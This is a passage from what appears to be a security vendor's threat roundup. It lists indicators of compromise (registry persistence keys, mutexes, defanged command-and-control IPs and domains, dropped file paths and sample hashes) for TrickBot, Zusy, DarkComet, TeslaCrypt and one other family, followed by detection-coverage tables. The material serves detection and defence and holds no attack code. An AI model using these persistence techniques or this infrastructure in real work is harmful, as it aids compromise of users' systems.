<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config4
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-100
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-101
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-103
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-102
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-1
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-2
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-4
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-3
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-100
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-101
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-102
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-103
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-100
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-101
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-102
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-103
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config3
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FNWISXTV
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FNWISXTV
Value Name: DisplayName
1
Mutexes Occurrences
Global\27a1e0c1-13fc-11ed-9660-001517101edf 1
Global\30977501-13fc-11ed-9660-001517215b93 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
216[.]146[.]35[.]35 3
31[.]13[.]65[.]174 3
142[.]251[.]40[.]196 3
96[.]103[.]145[.]165 3
31[.]41[.]244[.]82 3
31[.]41[.]244[.]85 3
80[.]66[.]75[.]254 3
80[.]66[.]75[.]4 3
31[.]41[.]244[.]128 3
31[.]41[.]244[.]126/31 3
208[.]76[.]51[.]51 2
74[.]208[.]5[.]20 2
208[.]76[.]50[.]50 2
202[.]137[.]234[.]30 2
212[.]77[.]101[.]4 2
193[.]222[.]135[.]150 2
203[.]205[.]219[.]57 2
47[.]43[.]18[.]9 2
67[.]231[.]144[.]94 2
188[.]125[.]72[.]74 2
40[.]93[.]207[.]0/31 2
205[.]220[.]176[.]72 2
135[.]148[.]130[.]75 2
121[.]53[.]85[.]11 2
67[.]195[.]204[.]72/30 1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 3
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 3
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 3
249[.]5[.]55[.]69[.]in-addr[.]arpa 3
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 3
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 3
microsoft-com[.]mail[.]protection[.]outlook[.]com 3
microsoft[.]com 3
www[.]google[.]com 3
www[.]instagram[.]com 3
comcast[.]net 3
mx1a1[.]comcast[.]net 3
jotunheim[.]name 3
niflheimr[.]cn 3
whois[.]arin[.]net 2
whois[.]iana[.]org 2
mx-eu[.]mail[.]am0[.]yahoodns[.]net 2
aspmx[.]l[.]google[.]com 2
mta5[.]am0[.]yahoodns[.]net 2
icloud[.]com 2
cox[.]net 2
walla[.]com 2
hanmail[.]net 2
allstate[.]com 2
wp[.]pl 2
*See JSON for more IOCs
Files and or directories created Occurrences
%SystemRoot%\SysWOW64\config\systemprofile 3
%SystemRoot%\SysWOW64\config\systemprofile:.repos 3
%SystemRoot%\SysWOW64\fnwisxtv 1
%SystemRoot%\SysWOW64\airdnsoq 1
%SystemRoot%\SysWOW64\uclxhmik 1
%TEMP%\dnyabinr.exe 1
%TEMP%\lcxykqya.exe 1
%TEMP%\qzguacfj.exe 1

File Hashes

098ad43e2067c5c814cebe1fc52bdc528289c6a2cc96daf4e8bac90d1c95a0b3 2240525bf4ee830766ec33e2e3c0dfcdf871748088fcf068770fd306940c5957 693cd93fbc6bfb587ad011477ae870805725c5403260621a290f61bb0d243f47 a6b68aa5d00739401b413ed936526ea5e767824fddb4e768e03fb05dc369a6fd b9820bc7b09bfa88556efac463b7459d2f4a47f06cc953529a9782fdbefd4959 c2cb05d50c06d9ed65a7c53fb2f6b7977f2988f5fbbd928266bb8ea27723b243 d6df88c6f61812a4bb662abb8d90fb4ba7e17ae5b9351251d001b7945d7aae98 ec745df5a9e65776f76b97e9685ad86fbb130bb6a3146a7823bd94c7c6502f1d f3e93f62b4f4699a3d20e85fa3c9e8b7eb9129a15ca66720d4f677cae0c5a469 f8a2e41ea8ca0e998bcd54d8256cb538b1e32cec4e80eb810e8df003427b886b

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.TrickBot-9960840-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 36 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\USERDS 36
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS
Value Name: 4334c972
36
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS
Value Name: 2d17e659
36
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IntelPowerAgent3
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IntelPowerAgent5
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IntelPowerAgent9
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IntelPowerAgent6
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IntelPowerAgent7
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IntelPowerAgent2
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IntelPowerAgent1
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IntelPowerAgent8
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IntelPowerAgent0
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IntelPowerAgent4
2
Mutexes Occurrences
98b59d0b000000cc 36
98b59d0b00000120 36
Global\{2d17e659d34601689591} 36
98b59d0b00000174 36
98b59d0b00000150 36
98b59d0b00000158 36
98b59d0b000001ac 35
98b59d0b00000308 35
98b59d0b0000043c 35
98b59d0b000004b4 35
98b59d0b000001bc 35
98b59d0b000002ec 35
98b59d0b000001f0 35
98b59d0b000001c4 35
98b59d0b0000021c 35
98b59d0b0000025c 35
98b59d0b00000294 35
98b59d0b00000320 35
98b59d0b000003d4 35
98b59d0b000003f8 35
98b59d0b000004dc 35
98b59d0b0000060c 8
98b59d0b000005cc 8
98b59d0b000004f8 8
98b59d0b00000614 7
*See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
209[.]197[.]3[.]8 11
72[.]21[.]81[.]240 7
69[.]164[.]46[.]0 6
8[.]253[.]154[.]236/31 3
23[.]46[.]150[.]81 2
23[.]46[.]150[.]58 2
8[.]253[.]141[.]249 1
8[.]253[.]38[.]248 1
8[.]253[.]140[.]118 1
23[.]46[.]150[.]43 1
8[.]247[.]119[.]126 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
download[.]windowsupdate[.]com 36
adtejoyo1377[.]tk 36
Files and or directories created Occurrences
%ProgramData%\c7150968.exe 1
%LOCALAPPDATA%\gusEBBF.tmp.bat 1
%ProgramData%\ba886437.exe 1
%HOMEPATH%\jfpDCC6.tmp.bat 1
%ProgramData%\63b007ed.exe 1
%HOMEPATH%\dtaE10F.tmp.bat 1
%ProgramData%\545ba94b.exe 1
%HOMEPATH%\hcv6907.tmp.bat 1
%ProgramData%\7afae1e8.exe 1
%HOMEPATH%\greA7E2.tmp.bat 1
%ProgramData%\9421c9aa.exe 1
%APPDATA%\vqpA923.tmp.bat 1
%ProgramData%\f779fb59.exe 1
%ProgramData%\xywA29.tmp.bat 1
%ProgramData%\940d0a1e.exe 1
%HOMEPATH%\jawD8CB.tmp.bat 1
%ProgramData%\a37667ce.exe 1
%HOMEPATH%\lkyB72F.tmp.bat 1
%ProgramData%\edcfad58.exe 1
%HOMEPATH%\pvf22C5.tmp.bat 1
%ProgramData%\182b8517.exe 1
%LOCALAPPDATA%\qsw15A4.tmp.bat 1
%ProgramData%\a3a20124.exe 1
%HOMEPATH%\xqh15A4.tmp.bat 1
%ProgramData%\a116e074.exe 1
*See JSON for more IOCs

File Hashes

007a16c9f6908085a2d65e991ae691f41e7ceab17653200669b4286af82e8c12 017306c686a5a81630e746b9518106fd5e54b410b50a61f43cba7a3850b1fec8 024d73837dea32792852294b951dcb246c56442ebde4643cef6733f411f581b6 0284c0aff10ff3ca7e6078f3d8191fc9c4db42fbfb912a8cefabc937c1eca87d 02df9ec5bfb9e1bb613b5ee7d4a518bccc9f87580182f26d6e5d5a643036e3a1 03226228480f9e9d87a0370428d337023226314bd9447efccdbc03bb672ec81b 0337b9f06cda7d7a6e96ce2a29e0f004fb6df49d3b82d294a17a13604e754f86 03a89b1af244c7d20db8498d9284c20deea9462fb15db2f89b4c59a9be47c2f0 04432d06396fac85167c0a9dadf206dc50ea8527c29b943b77f192e45dbce22d 04679de514d8e3902341b314e324e6f75ba536d09da05e99958dc5b4a689de42 049f0322736b0abeec70630b9efbbd40d9a0916ce359a5a8168165d25a76e48f 04e819e635fc974afd4ee533b478841ba581ddcff254034fdbfea6522939ef5f 05b51b8179992a7e21259d9eacdaf8b1115e51056ec0104daddda5a0810f7126 0734ea55ac016a1e6b6ac40837883a684656eec9ce857351c9f99d3c965d6501 07e4ebd0b135dbfcf1e7d2b60386c9b52fa5d154d072a5689eb3a7a2b15112d6 08da477f7c363ddbc11224260717cf6f7f48e849cff403e25559529029b8fdf4 08e9ccb010aceac1ea0c0fbb41e58c8e2552b30de500bf43e298a645f5acedf7 097f9d7400b8a8c8bf5aa5339bf18359148a533f9136cd9b6279623e4db293d7 0bde820541632a300070601291eb1c478b9d09da2b405f740d6fe92b290a45de 0be2e49c02aa297d158bd5fe213a96584455fb4cea7c24dd100b9922df2a45c5 0bf64ebc68956ea9d73858f32530c20fab4243fb09320adfd500fb94842a9888 0c29c2763f311604136a06a99fa76ed09411572cd796021b60c66806e6c8e5a9 0c6b997f98a1e58caf5a16a90317d2cb1d2474ac5c5926f26fa2b14a9299638a 0d30d3c9cf63898bb2e970ec5a54dfe868fc5f519fd6b283bd00a2d22a01a653 0da6c492cc755852c07bf7511b774e2527dce42be420f602e9445f1bb760ad33
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Trojan.Zusy-9960880-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH 12
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: MarkTime
12
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: Description
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: Type
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: Start
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: ErrorControl
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: ImagePath
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: DisplayName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: WOW64
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: ObjectName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: FailureActions
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU
Value Name: MarkTime
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: Group
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: InstallTime
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: DisplayName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: WOW64
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: ObjectName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: FailureActions
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU
Value Name: Type
1
Mutexes Occurrences
127.0.0.1:8000:Cdefgh 3
112.74.89.58:44366:Cdefgh 3
112.74.89.58:42150:Cdefgh 1
47.100.137.128:8001:Pqrstu 1
22.23.24.56:8001:Pqrstu 1
hz122.f3322.org:8001:Cdefgh 1
112.74.89.58:35807:Cdefgh 1
112.74.89.58:46308:Cdefgh 1
101.33.196.136:3389:Cdefgh 1
127.0.0.1:8001:Cdefgh 1
183.28.28.43:8001:Abcdef 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
112[.]74[.]89[.]58 6
22[.]23[.]24[.]56 1
47[.]100[.]137[.]128 1
101[.]33[.]196[.]136 1
183[.]28[.]28[.]43 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
hz122[.]f3322[.]org 1
Files and or directories created Occurrences
%SystemRoot%\svchost.exe 4

File Hashes

04fa031e5d2d86f8dbe0d3b95d67ea774448df4613e8acce79f0c9a30ef041bc 2444b744b5c06e9410ee5c3baa807569fde44c5092192428de935e03d25b1edb 466ca0805173034a7b12a5ffce104bbe5ed312e7441abdb98849ae4103150d04 5a755f07d3b90ac5a2041fd04fd764c40882dd20b50f91fddbc10b8c6341591d 5b53262a14fe1dcd42d670b0488d0de11aeb7cfa84e36acb4eec0c13b5fd2d73 5ca6b22c6e7de5f0b9437970f1f9360ad4f3a74f964eb319080e347c27c6dff9 6ea5fdaa95dbe09ccbc474ba4fc9fbe796e79c02d2b4f65f223feda5643f5400 86bd70bc7bb74d3d4991b0f1c7e15ddef1d09695b3940c5fb015f2d00ce5f558 b9b344bd7005b233cbb85395f61c309938fe70e2f8a8d0b2c24441ba074f9ca5 bea6c7b4117eb1f894d830c77ddf6d4424bccb6043d0f43c257522d253321c3e c0a8a6e606e46a970cefe81f269ec6aec2a538830c2f7e03cf0eac55b135a59a c968ae3cfbbd89673b49f6bfd474eea846bdb1e2e3a7c5376dbcda5290d445ed dfc315d962da82d84b54683a849edf4e7b16bb136dbc2eb1198d35e528920103 ec6cb8ff27e33d7e69ce02885baa9c08fd5a03349a16a52590353a4ec364c464 f240b80b34fa480dc7236ddecb5c326e719a094e49df5a6f2070712650553066 fd0e616e5ebb9075c44bb6772cf8b2c46801fafdb0716636850dc2ec0fe06f8c

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.DarkComet-9961766-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 33 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\DC3_FEXEC 29
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Debugger
24
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: UserInit
23
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MicroUpdate
11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: svchost.exe
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM 5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableRegistryTools
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: rundll32
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN
Value Name: NoControlPanel
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Microsoft
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Updater
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Update
1
Mutexes Occurrences
DC_MUTEX-<random, matching [A-Z0-9]{7}> 22
DCPERSFWBP 18
DC_MUTEX-5DND8AT 7
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
99[.]229[.]175[.]244 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
pervert[.]no-ip[.]info 7
pervert2[.]no-ip[.]info 7
delvega[.]no-ip[.]org 2
wp-enhanced[.]no-ip[.]org 2
funstuff712[.]zapto[.]org 2
fflazhhf1[.]no-ip[.]org 1
darkcometss[.]no-ip[.]org 1
not4umac[.]no-ip[.]biz 1
sanderkidah[.]no-ip[.]org 1
bobolobob[.]no-ip[.]biz 1
hg-ma[.]zapto5[.]org 1
corrosivegas2010[.]zapto[.]org 1
profi555[.]no-ip[.]org 1
hg-ma[.]zapto[.]org 1
jugoboy1[.]zapto[.]org 1
hg-ma[.]zapto1[.]org 1
hg-ma[.]zapto2[.]org 1
hg-ma[.]zapto3[.]org 1
hg-ma[.]zapto4[.]org 1
jackreapez[.]zapto[.]org 1
magicmq[.]no-ip[.]org 1
kenrickm[.]no-ip[.]org 1
mrganja[.]no-ip[.]org 1
cherubi[.]no-ip[.]org 1
Files and or directories created Occurrences
%APPDATA%\WinDbg 30
%APPDATA%\WinDbg\windbg.exe 29
%APPDATA%\dclogs 28
\svchost.exe 7
%TEMP%\uxcv9v 7
%TEMP%\uxcv9v.vbs 7
%HOMEPATH%\Documents\MSDCSC 6
%HOMEPATH%\Documents\MSDCSC\msdcsc.exe 6
%TEMP%\MSDCSC 5
%TEMP%\MSDCSC\msdcsc.exe 5
%SystemRoot%\SysWOW64\MSDCSC 3
%SystemRoot%\SysWOW64\MSDCSC\msdcsc.exe 3
%TEMP%\tMMjnM 1
%TEMP%\xMWbLz.vbs 1
%TEMP%\tMMjnM.vbs 1
%APPDATA%\WinDbg\msdnaa.exe 1
%TEMP%\Mi0z67 1
%HOMEPATH%\Documents\Explorer\Iexplorer.exe 1
%TEMP%\q7EVTk 1
%TEMP%\mmsHyU 1
%TEMP%\q7EVTk.vbs 1
%TEMP%\mmsHyU.vbs 1
%APPDATA%\WinUpd\WinUpdater.exe 1
%TEMP%\alRnXV 1
%TEMP%\alRnXV.vbs 1
*See JSON for more IOCs

File Hashes

0153ea1e28f729d6604f422075202e48a599969c04c30e4a3056e3a308148eb3 050332edd1c7356a6e8a86471699135d90ba402d1f7ac0a27da39ccdb94ba0e8 07525015abc52c0820727bbfe3a29f62e1e5e0ca8af36ca8716ae5ea12e71a75 09fce07fb07b90dc54f5e72dd08d8677f62e948e6a0450e63f25cc6e22f99ff5 0a5710ed174fbee931562112147c3bf6cf8609a5f1674d0c878a6888548cb0c9 0db09a5cc0ff770b4024f14bf6b56b03c4ec599fe0499fc3a8d5da2625d93954 0f67c4df374d4e01f9838a7dc6ab174c0d8f4b5f2485b670f24c7fcdf65f3269 10f39ff02541b02857c11ca18a1cc745e075224ad510af7ad18b21dcb0d3cfa0 12449565aed227128301078ece7695cd6fbd8fb735e8f8b4238e08a1b181a651 13d377317be765d9d333e6a6d41bb83cffb606547dc308fefe0dcea87133b172 157be56d2b1cee72ad290957752e089cd39f39c51807c6791b25b875113758ab 15c65c639231d17726fa4a2c0cef2a7975a52f5d71ba8d7e4e3e1f053c066528 16cc7eabf5a54d8b376b6de32e2591902044a558ded0a527fcc0143e1686c4af 16e972675f3d1bd26aff1accdde7925e4cd5ba6d5f2a33826d3d75606a1bc955 173cae8d47a5d796b06fdd18c951003342ad08d0aee4be2823332df003b5673a 17dbbd57df81e29f2d19aba93c1626efe92bff713ad8b8e65b449e843aff54e8 19370c555e8e7ed5133ca6efa7acc98fc360983cc04193cc195ea0c8a0bf2931 1984c2439c1acacb9ec7c6468db48017d8c2aa4e2da5829d572bb6f5050e80cd 1b7a03db77e43e04badd95d28554df1f9e3d97197605af709df0387d3bd0c1e8 1b9f9491a6d98e3de499641caa8ac736f2c6f76e4ac8960170d89fea7026c69e 1bd9838e181acb88813cdea1d228b445e06b921bff3cece199f9551522eff27d 1cd35eff6c0963356162d68f5434b19728f2805db71b5c616ff534d2c961d093 1d25e1479054eea2355385f60a9ce320af2e5ff5ff1333bfabc72518f7337056 1f3c3ebac21a63328b72317246fb5731720e1d311cdb7928543e1c13e87994d3 2066531192b69556304df9a65266a2d2e5978ae8cec323b6860eb230fd2faa79
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Ransomware.TeslaCrypt-9960924-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLinkedConnections
16
<HKU>\.DEFAULT\SOFTWARE\TRUEIMG 16
<HKCU>\SOFTWARE\TRUEIMG 16
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting
16
<HKCU>\SOFTWARE\TRUEIMG
Value Name: ID
16
<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'> 16
<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'>
Value Name: data
16
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: _lfia
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: _hfnk
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: _kcgt
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: _ppqk
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: _kaol
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: _abtg
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: _rpua
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: _raet
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: _kwxa
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: _ojsf
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: _kiyk
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: _iykv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: _hpdk
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: _htkc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: _fshu
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: _fanp
1
Mutexes Occurrences
__xfghx__ 16
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
74[.]220[.]199[.]6 16
64[.]190[.]63[.]111 16
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
prodocument[.]co[.]uk 16
marketathart[.]com 16
joshsawyerdesign[.]com 16
emmy2015[.]com 16
nlhomegarden[.]com 16
esbook[.]com 16
Files and or directories created Occurrences
%ProgramFiles%\7-Zip\Lang\lv.txt 16
%ProgramFiles%\7-Zip\Lang\mk.txt 16
%ProgramFiles%\7-Zip\Lang\mn.txt 16
%ProgramFiles%\7-Zip\Lang\mng.txt 16
%ProgramFiles%\7-Zip\Lang\mng2.txt 16
%ProgramFiles%\7-Zip\Lang\mr.txt 16
%ProgramFiles%\7-Zip\Lang\ms.txt 16
%ProgramFiles%\7-Zip\Lang\nb.txt 16
%ProgramFiles%\7-Zip\Lang\ne.txt 16
%ProgramFiles%\7-Zip\Lang\nl.txt 16
%ProgramFiles%\7-Zip\Lang\nn.txt 16
%ProgramFiles%\7-Zip\Lang\pa-in.txt 16
%ProgramFiles%\7-Zip\Lang\pl.txt 16
%ProgramFiles%\7-Zip\Lang\ps.txt 16
%ProgramFiles%\7-Zip\Lang\pt-br.txt 16
%ProgramFiles%\7-Zip\Lang\pt.txt 16
%ProgramFiles%\7-Zip\Lang\ro.txt 16
%ProgramFiles%\7-Zip\Lang\ru.txt 16
%ProgramFiles%\7-Zip\Lang\sa.txt 16
%ProgramFiles%\7-Zip\Lang\si.txt 16
%ProgramFiles%\7-Zip\Lang\sk.txt 16
%ProgramFiles%\7-Zip\Lang\sl.txt 16
